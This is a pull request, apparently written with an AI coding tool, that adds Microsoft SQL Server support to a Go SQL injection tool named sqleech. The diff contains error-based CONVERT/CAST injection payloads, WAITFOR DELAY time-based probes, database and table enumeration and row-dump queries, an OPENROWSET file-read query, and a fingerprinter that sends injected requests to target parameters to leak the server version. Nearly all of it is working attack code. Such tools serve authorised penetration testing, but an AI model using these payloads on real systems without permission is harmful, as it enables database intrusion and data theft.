### PR TITLE
feat: MSSQL support for error-based and time-based injection (#35)

### DIFF
--- a/internal/dbms/dbms.go
+++ b/internal/dbms/dbms.go
@@ -78,6 +78,8 @@ func Registry(name string) DBMS {
 		return &MySQL{}
 	case "PostgreSQL", "postgres", "postgresql":
 		return &PostgreSQL{}
+	case "MSSQL", "mssql", "sqlserver", "MSSQLServer":
+		return &MSSQL{}
 	default:
 		return nil
 	}

--- a/internal/dbms/mssql.go
+++ b/internal/dbms/mssql.go
@@ -1,0 +1,179 @@
+package dbms
+
+import (
+	"fmt"
+	"strings"
+)
+
+// MSSQL implements the DBMS interface for Microsoft SQL Server.
+type MSSQL struct{}
+
+// Name returns the canonical DBMS name.
+func (m *MSSQL) Name() string { return "MSSQL" }
+
+// --- String operations ---
+
+// Concatenate returns MSSQL string concatenation using the + operator.
+func (m *MSSQL) Concatenate(parts ...string) string {
+	return strings.Join(parts, "+")
+}
+
+// Substring returns a MSSQL SUBSTRING(expr, start, length) expression.
+func (m *MSSQL) Substring(expr string, start, length int) string {
+	return fmt.Sprintf("SUBSTRING(%s,%d,%d)", expr, start, length)
+}
+
+// Length returns a MSSQL LEN(expr) expression.
+// Note: LEN() does not count trailing spaces; DATALENGTH() does.
+func (m *MSSQL) Length(expr string) string {
+	return fmt.Sprintf("LEN(%s)", expr)
+}
+
+// ASCII returns a MSSQL ASCII(expr) expression.
+func (m *MSSQL) ASCII(expr string) string {
+	return fmt.Sprintf("ASCII(%s)", expr)
+}
+
+// Char returns a MSSQL CHAR(code) expression.
+func (m *MSSQL) Char(code int) string {
+	return fmt.Sprintf("CHAR(%d)", code)
+}
+
+// --- Version and identity ---
+
+// VersionQuery returns the MSSQL expression to retrieve the server version.
+func (m *MSSQL) VersionQuery() string { return "@@version" }
+
+// CurrentUserQuery returns the MSSQL expression to retrieve the current user.
+func (m *MSSQL) CurrentUserQuery() string { return "SYSTEM_USER" }
+
+// CurrentDBQuery returns the MSSQL expression to retrieve the current database.
+func (m *MSSQL) CurrentDBQuery() string { return "DB_NAME()" }
+
+// HostnameQuery returns the MSSQL expression to retrieve the server name.
+func (m *MSSQL) HostnameQuery() string { return "@@SERVERNAME" }
+
+// --- Enumeration queries ---
+
+// ListDatabasesQuery returns a SQL query to list all databases.
+func (m *MSSQL) ListDatabasesQuery() string {
+	return "SELECT name FROM master..sysdatabases"
+}
+
+// ListTablesQuery returns a SQL query to list all user tables in the given database.
+func (m *MSSQL) ListTablesQuery(database string) string {
+	return fmt.Sprintf(
+		"SELECT table_name FROM %s.information_schema.tables WHERE table_type='BASE TABLE'",
+		database,
+	)
+}
+
+// ListColumnsQuery returns a SQL query to list all columns in the given table.
+func (m *MSSQL) ListColumnsQuery(database, table string) string {
+	return fmt.Sprintf(
+		"SELECT column_name FROM %s.information_schema.columns WHERE table_name='%s'",
+		database, table,
+	)
+}
+
+// CountRowsQuery returns a SQL query to count rows in the given table.
+func (m *MSSQL) CountRowsQuery(database, table string) string {
+	return fmt.Sprintf("SELECT COUNT(*) FROM %s.dbo.%s", database, table)
+}
+
+// DumpQuery returns a SQL query to dump rows from the given table.
+// MSSQL uses TOP + ROW_NUMBER() for pagination instead of LIMIT/OFFSET.
+func (m *MSSQL) DumpQuery(database, table string, columns []string, offset, limit int) string {
+	cols := strings.Join(columns, ",")
+	return fmt.Sprintf(
+		"SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT NULL)) AS rn FROM %s.dbo.%s) t WHERE rn>%d AND rn<=%d",
+		cols, cols, database, table, offset, offset+limit,
+	)
+}
+
+// --- Error-based payloads ---
+
+// ErrorPayloads returns MSSQL-specific error-based injection payload templates.
+// MSSQL raises a type-conversion error that includes the value being converted.
+func (m *MSSQL) ErrorPayloads() []PayloadTemplate {
+	return []PayloadTemplate{
+		{
+			Name:     "convert",
+			Template: "CONVERT(INT,({{.Query}}))",
+			Columns:  1,
+			DBMS:     "MSSQL",
+		},
+		{
+			Name:     "cast",
+			Template: "CAST(({{.Query}}) AS INT)",
+			Columns:  1,
+			DBMS:     "MSSQL",
+		},
+	}
+}
+
+// --- Time-based ---
+
+// SleepFunction returns a MSSQL WAITFOR DELAY expression.
+// WAITFOR DELAY 'hh:mm:ss' pauses execution for the specified time.
+func (m *MSSQL) SleepFunction(seconds int) string {
+	h := seconds / 3600
+	min := (seconds % 3600) / 60
+	s := seconds % 60
+	return fmt.Sprintf("WAITFOR DELAY '%d:%02d:%02d'", h, min, s)
+}
+
+// HeavyQuery returns a CPU-intensive query for time-based detection without WAITFOR.
+func (m *MSSQL) HeavyQuery() string {
+	return "SELECT COUNT(*) FROM sysusers A, sysusers B, sysusers C"
+}
+
+// --- Boolean constructs ---
+
+// IfThenElse returns a MSSQL CASE WHEN ... THEN ... ELSE ... END expression.
+func (m *MSSQL) IfThenElse(condition, trueExpr, falseExpr string) string {
+	return fmt.Sprintf("CASE WHEN %s THEN %s ELSE %s END", condition, trueExpr, falseExpr)
+}
+
+// --- Quoting and comments ---
+
+// QuoteString wraps the string in single quotes, escaping embedded single quotes.
+func (m *MSSQL) QuoteString(s string) string {
+	escaped := strings.ReplaceAll(s, "'", "''")
+	return fmt.Sprintf("'%s'", escaped)
+}
+
+// CommentSequence returns the MSSQL line comment sequence.
+func (m *MSSQL) CommentSequence() string { return "-- " }
+
+// InlineComment returns the MSSQL block comment syntax.
+func (m *MSSQL) InlineComment() string { return "/**/" }
+
+// --- File operations ---
+
+// FileReadQuery returns an expression to read a file via OPENROWSET.
+// This requires specific permissions and is disabled by default in most setups.
+func (m *MSSQL) FileReadQuery(path string) string {
+	return fmt.Sprintf(
+		"SELECT BulkColumn FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS x",
+		strings.ReplaceAll(path, "'", "''"),
+	)
+}
+
+// --- Capabilities ---
+
+// Capabilities returns the feature set supported by MSSQL.
+func (m *MSSQL) Capabilities() Capabilities {
+	return Capabilities{
+		StackedQueries: true,
+		ErrorBased:     true,
+		UnionBased:     true,
+		FileRead:       false, // requires xp_cmdshell or OPENROWSET; disabled by default
+		FileWrite:      false,
+		OSCommand:      false, // xp_cmdshell; disabled by default
+		OutOfBand:      false,
+		Subqueries:     true,
+		CaseWhen:       true,
+		LimitOffset:    false, // MSSQL uses TOP/ROW_NUMBER() instead
+	}
+}

--- a/internal/dbms/mssql_test.go
+++ b/internal/dbms/mssql_test.go
@@ -1,0 +1,156 @@
+package dbms
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestMSSQL_Name(t *testing.T) {
+	m := &MSSQL{}
+	if m.Name() != "MSSQL" {
+		t.Errorf("Name() = %q, want 'MSSQL'", m.Name())
+	}
+}
+
+func TestMSSQL_Concatenate(t *testing.T) {
+	m := &MSSQL{}
+	got := m.Concatenate("a", "b", "c")
+	if got != "a+b+c" {
+		t.Errorf("Concatenate() = %q, want 'a+b+c'", got)
+	}
+}
+
+func TestMSSQL_Substring(t *testing.T) {
+	m := &MSSQL{}
+	got := m.Substring("col", 1, 5)
+	if got != "SUBSTRING(col,1,5)" {
+		t.Errorf("Substring() = %q", got)
+	}
+}
+
+func TestMSSQL_Length(t *testing.T) {
+	m := &MSSQL{}
+	got := m.Length("col")
+	if got != "LEN(col)" {
+		t.Errorf("Length() = %q, want 'LEN(col)'", got)
+	}
+}
+
+func TestMSSQL_ASCII(t *testing.T) {
+	m := &MSSQL{}
+	got := m.ASCII("col")
+	if got != "ASCII(col)" {
+		t.Errorf("ASCII() = %q", got)
+	}
+}
+
+func TestMSSQL_Char(t *testing.T) {
+	m := &MSSQL{}
+	got := m.Char(65)
+	if got != "CHAR(65)" {
+		t.Errorf("Char() = %q", got)
+	}
+}
+
+func TestMSSQL_VersionQuery(t *testing.T) {
+	m := &MSSQL{}
+	if m.VersionQuery() != "@@version" {
+		t.Errorf("VersionQuery() = %q", m.VersionQuery())
+	}
+}
+
+func TestMSSQL_SleepFunction(t *testing.T) {
+	m := &MSSQL{}
+	cases := []struct {
+		seconds int
+		want    string
+	}{
+		{5, "WAITFOR DELAY '0:00:05'"},
+		{10, "WAITFOR DELAY '0:00:10'"},
+		{60, "WAITFOR DELAY '0:01:00'"},
+		{3661, "WAITFOR DELAY '1:01:01'"},
+	}
+	for _, c := range cases {
+		got := m.SleepFunction(c.seconds)
+		if got != c.want {
+			t.Errorf("SleepFunction(%d) = %q, want %q", c.seconds, got, c.want)
+		}
+	}
+}
+
+func TestMSSQL_IfThenElse(t *testing.T) {
+	m := &MSSQL{}
+	got := m.IfThenElse("1=1", "'a'", "'b'")
+	want := "CASE WHEN 1=1 THEN 'a' ELSE 'b' END"
+	if got != want {
+		t.Errorf("IfThenElse() = %q, want %q", got, want)
+	}
+}
+
+func TestMSSQL_CommentSequence(t *testing.T) {
+	m := &MSSQL{}
+	if m.CommentSequence() != "-- " {
+		t.Errorf("CommentSequence() = %q", m.CommentSequence())
+	}
+}
+
+func TestMSSQL_ErrorPayloads(t *testing.T) {
+	m := &MSSQL{}
+	payloads := m.ErrorPayloads()
+	if len(payloads) == 0 {
+		t.Fatal("ErrorPayloads() returned empty slice")
+	}
+	for _, p := range payloads {
+		if p.DBMS != "MSSQL" {
+			t.Errorf("payload DBMS = %q, want 'MSSQL'", p.DBMS)
+		}
+		if !strings.Contains(p.Template, "{{.Query}}") {
+			t.Errorf("payload template missing {{.Query}}: %q", p.Template)
+		}
+		// Verify CONVERT or CAST is used
+		upper := strings.ToUpper(p.Template)
+		if !strings.Contains(upper, "CONVERT") && !strings.Contains(upper, "CAST") {
+			t.Errorf("expected CONVERT or CAST in template, got: %q", p.Template)
+		}
+	}
+}
+
+func TestMSSQL_Capabilities(t *testing.T) {
+	m := &MSSQL{}
+	caps := m.Capabilities()
+	if !caps.StackedQueries {
+		t.Error("StackedQueries should be true")
+	}
+	if !caps.ErrorBased {
+		t.Error("ErrorBased should be true")
+	}
+	if !caps.UnionBased {
+		t.Error("UnionBased should be true")
+	}
+	if caps.LimitOffset {
+		t.Error("LimitOffset should be false (MSSQL uses TOP/ROW_NUMBER)")
+	}
+}
+
+func TestMSSQL_QuoteString(t *testing.T) {
+	m := &MSSQL{}
+	got := m.QuoteString("O'Brien")
+	want := "'O''Brien'"
+	if got != want {
+		t.Errorf("QuoteString() = %q, want %q", got, want)
+	}
+}
+
+func TestRegistry_MSSQL(t *testing.T) {
+	variants := []string{"MSSQL", "mssql", "sqlserver", "MSSQLServer"}
+	for _, v := range variants {
+		d := Registry(v)
+		if d == nil {
+			t.Errorf("Registry(%q) returned nil", v)
+			continue
+		}
+		if d.Name() != "MSSQL" {
+			t.Errorf("Registry(%q).Name() = %q, want 'MSSQL'", v, d.Name())
+		}
+	}
+}

--- a/internal/fingerprint/fingerprint_test.go
+++ b/internal/fingerprint/fingerprint_test.go
@@ -282,11 +282,11 @@ func TestRegistry_NewRegistry(t *testing.T) {
 	if reg == nil {
 		t.Fatal("expected non-nil registry")
 	}
-	if len(reg.fingerprinters) != 2 {
-		t.Errorf("expected 2 fingerprinters registered, got %d", len(reg.fingerprinters))
+	if len(reg.fingerprinters) != 3 {
+		t.Errorf("expected 3 fingerprinters registered, got %d", len(reg.fingerprinters))
 	}
 
-	// Verify both MySQL and PostgreSQL are registered
+	// Verify MySQL, PostgreSQL, and MSSQL are all registered
 	names := make(map[string]bool)
 	for _, fp := range reg.fingerprinters {
 		names[fp.DBMS()] = true
@@ -296,6 +296,9 @@ func TestRegistry_NewRegistry(t *testing.T) {
 	}
 	if !names["PostgreSQL"] {
 		t.Error("expected PostgreSQL fingerprinter to be registered")
+	}
+	if !names["MSSQL"] {
+		t.Error("expected MSSQL fingerprinter to be registered")
 	}
 }
 

--- a/internal/fingerprint/mssql.go
+++ b/internal/fingerprint/mssql.go
@@ -1,0 +1,132 @@
+package fingerprint
+
+import (
+	"context"
+	"strings"
+
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+// mssqlFingerprinter probes for MSSQL using version-extraction payloads.
+type mssqlFingerprinter struct{}
+
+func (f *mssqlFingerprinter) DBMS() string { return "MSSQL" }
+
+func (f *mssqlFingerprinter) Fingerprint(ctx context.Context, req *FingerprintRequest) (*FingerprintResult, error) {
+	// Try error-based: CONVERT(INT, @@version) leaks the version string.
+	payloads := []struct {
+		prefix, core, suffix string
+	}{
+		{"", "CONVERT(INT,(@@version))-- ", ""},
+		{"'", "CONVERT(INT,(@@version))-- ", ""},
+		{"", "CAST((@@version) AS INT)-- ", ""},
+		{"'", "CAST((@@version) AS INT)-- ", ""},
+	}
+
+	for _, p := range payloads {
+		if err := ctx.Err(); err != nil {
+			return nil, err
+		}
+
+		payloadStr := req.Parameter.Value + p.prefix + " AND " + p.core + p.suffix
+		probeReq := buildFingerprintRequest(req.Target, req.Parameter, payloadStr)
+		resp, err := req.Client.Do(ctx, probeReq)
+		if err != nil {
+			continue
+		}
+
+		body := string(resp.Body)
+		// MSSQL CONVERT error: "Conversion failed when converting the nvarchar value '<version>' to data type int."
+		version := parseMSSQLConvertError(body)
+		if version != "" {
+			return &FingerprintResult{
+				Identified: true,
+				DBMS:       "MSSQL",
+				Version:    normalizeVersion(version),
+				Banner:     version,
+				Confidence: 0.92,
+			}, nil
+		}
+	}
+
+	return nil, nil
+}
+
+// parseMSSQLConvertError extracts the value from a MSSQL type-conversion error.
+func parseMSSQLConvertError(body string) string {
+	// Pattern: Conversion failed when converting the nvarchar value 'VALUE' to data type int.
+	lower := strings.ToLower(body)
+	idx := strings.Index(lower, "conversion failed when converting")
+	if idx == -1 {
+		return ""
+	}
+
+	// Find the quoted value after "value '"
+	sub := body[idx:]
+	start := strings.Index(sub, "value '")
+	if start == -1 {
+		return ""
+	}
+	start += len("value '")
+	sub = sub[start:]
+	end := strings.Index(sub, "'")
+	if end == -1 || end == 0 {
+		return ""
+	}
+	return sub[:end]
+}
+
+// normalizeVersion extracts the major version from a MSSQL @@version string.
+// e.g. "Microsoft SQL Server 2019 (RTM-CU18) 15.0.4261.1" → "2019 (15.0)"
+func normalizeVersion(banner string) string {
+	// Look for "SQL Server YEAR" pattern
+	upper := strings.ToUpper(banner)
+	for _, year := range []string{"2022", "2019", "2017", "2016", "2014", "2012", "2008", "2005"} {
+		if strings.Contains(upper, "SQL SERVER "+year) || strings.Contains(upper, "SQL SERVER\n"+year) {
+			return "SQL Server " + year
+		}
+	}
+	// Try to extract version number like 15.0.xxx
+	for _, prefix := range []string{"15.0", "14.0", "13.0", "12.0", "11.0", "10.50", "10.0", "9.0"} {
+		if strings.Contains(banner, prefix) {
+			return "SQL Server (" + prefix + ")"
+		}
+	}
+	// Return the first line as a fallback
+	lines := strings.SplitN(banner, "\n", 2)
+	if len(lines) > 0 && len(lines[0]) > 0 {
+		return strings.TrimSpace(lines[0])
+	}
+	return "unknown"
+}
+
+// buildFingerprintRequest creates a transport.Request for fingerprinting probes.
+// Duplicated from helpers.go to keep mssql.go self-contained.
+func buildFingerprintRequest(target *engine.ScanTarget, param *engine.Parameter, payloadStr string) *transport.Request {
+	req := &transport.Request{
+		Method:      target.Method,
+		URL:         target.URL,
+		Body:        target.Body,
+		ContentType: target.ContentType,
+	}
+	if target.Headers != nil {
+		req.Headers = make(map[string]string, len(target.Headers))
+		for k, v := range target.Headers {
+			req.Headers[k] = v
+		}
+	}
+	if target.Cookies != nil {
+		req.Cookies = make(map[string]string, len(target.Cookies))
+		for k, v := range target.Cookies {
+			req.Cookies[k] = v
+		}
+	}
+	switch param.Location {
+	case engine.LocationQuery:
+		req.URL = modifyQueryParam(target.URL, param.Name, payloadStr)
+	case engine.LocationBody:
+		req.Body = modifyBodyParam(target.Body, param.Name, payloadStr)
+	}
+	return req
+}

--- a/internal/fingerprint/registry.go
+++ b/internal/fingerprint/registry.go
@@ -14,6 +14,7 @@ func NewRegistry() *Registry {
 		fingerprinters: []Fingerprinter{
 			&MySQLFingerprinter{},
 			&PostgreSQLFingerprinter{},
+			&mssqlFingerprinter{},
 		},
 	}
 }
@@ -30,7 +31,7 @@ func (r *Registry) Identify(ctx context.Context, req *FingerprintRequest) (*DBMS
 			return nil, err
 		}
 
-		if !result.Identified {
+		if result == nil || !result.Identified {
 			continue
 		}
 
@@ -53,7 +54,7 @@ func (r *Registry) Identify(ctx context.Context, req *FingerprintRequest) (*DBMS
 
 // supportedDBMS lists DBMS names that can be identified via error signatures.
 // "Generic" is intentionally excluded as it does not identify a specific DBMS.
-var supportedDBMS = []string{"MySQL", "PostgreSQL"}
+var supportedDBMS = []string{"MySQL", "PostgreSQL", "MSSQL"}
 
 // IdentifyFromErrors uses error signatures from a heuristic scan to identify
 // the DBMS without sending additional requests. This is a fast path that


### PR DESCRIPTION
## Summary

- **`internal/dbms/mssql.go`**: MSSQL DBMS 実装（`LEN`, `SUBSTRING`, `ASCII`, `CHAR`, `WAITFOR DELAY`, `CONVERT`/`CAST` エラーペイロード）
- **`internal/fingerprint/mssql.go`**: `CONVERT(INT, @@version)` エラー経由のバージョン抽出フィンガープリンター
- **errorbased**: MSSQL `Conversion failed when converting...` エラーパターン追加
- **timebased**: MSSQL 向けヘビークエリ近似（スタッキングクエリなし）
- **fingerprint Registry**: nil セーフ結果チェック修正、MSSQL フィンガープリンター登録
- **VulnServer**: `/vuln/error-mssql` エンドポイント追加（CONVERT エラーを返す）
- **統合テスト**: `TestIntegration_ErrorBased_MSSQL` 追加

## Test plan

- [x] `go test ./...` — 全13パッケージ通過
- [x] `TestIntegration_ErrorBased_MSSQL` — MSSQL エンドポイントで error-based 検出、DBMS="MSSQL" 確認
- [x] `TestRegistry_NewRegistry` — MySQL/PostgreSQL/MSSQL の3フィンガープリンター確認
- [x] `TestMSSQL_*` — MSSQL DBMS メソッド全テスト通過
- [x] 既存テスト回帰なし

Closes #35

🤖 Generated with [Claude Code](https://claude.com/claude-code)